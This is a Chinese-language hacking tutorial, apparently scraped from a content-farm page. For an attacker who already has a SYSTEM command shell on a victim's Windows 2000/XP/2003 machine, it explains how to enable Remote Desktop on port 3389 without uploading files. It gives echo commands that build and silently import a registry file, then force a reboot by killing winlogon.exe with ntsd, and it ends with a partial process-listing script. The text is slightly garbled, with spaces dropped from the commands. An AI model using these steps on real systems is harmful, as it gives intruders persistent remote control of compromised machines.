今天介绍的这种开终端的方法,绿色,环保,无污染~~
不须上传任何文件开启终端的方法适合win2k,XP,2003.
本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
在无须传任何文件的情况下开启终端服务,
开启终端的最简单方法全攻略
。一、win2k下终端开启终端
首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:
echoWindowsRegistryEditorVersion5.00>>3389.reg
echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]>>3389.reg
echo"Enabled"="0">>3389.reg
echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]>>3389.reg
echo"ShutdownWithoutLogon"="0">>3389.reg
echo[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>3389.reg
echo"EnableAdminTSRemote"=dWord:00000001>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>>3389.reg
echo"TSEnabled"=dword:00000001>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>3389.reg
echo"Start"=dword:00000002>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>3389.reg
echo"Start"=dword:00000002>>3389.reg
echo[HKEY_USERS\.DEFAULT\KeyboardLayout\Toggle]>>3389.reg
echo"Hotkey"="1">>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp]>>3389.reg
echo"PortNumber"=dword:00000D3D>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>3389.reg
echo"PortNumber"=dword:00000D3D>>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit/s3389.reg导入注册表,
电脑资料
《开启终端的最简单方法全攻略》(http://meiwen.anslib.com)。(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。
一个简单的办法就是用ntsd.exe(win2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!
比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)
winlogon.exe被关闭后机器立刻强制重启了
命令执行格式为ntsd-cq-pPID
那如何知道winlogon.exe的PID进程号呢~
以下这个脚本可以列举当前所有进程的PID:
wscript.echo"PIDProcessName"
foreachpsingetobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echops.handle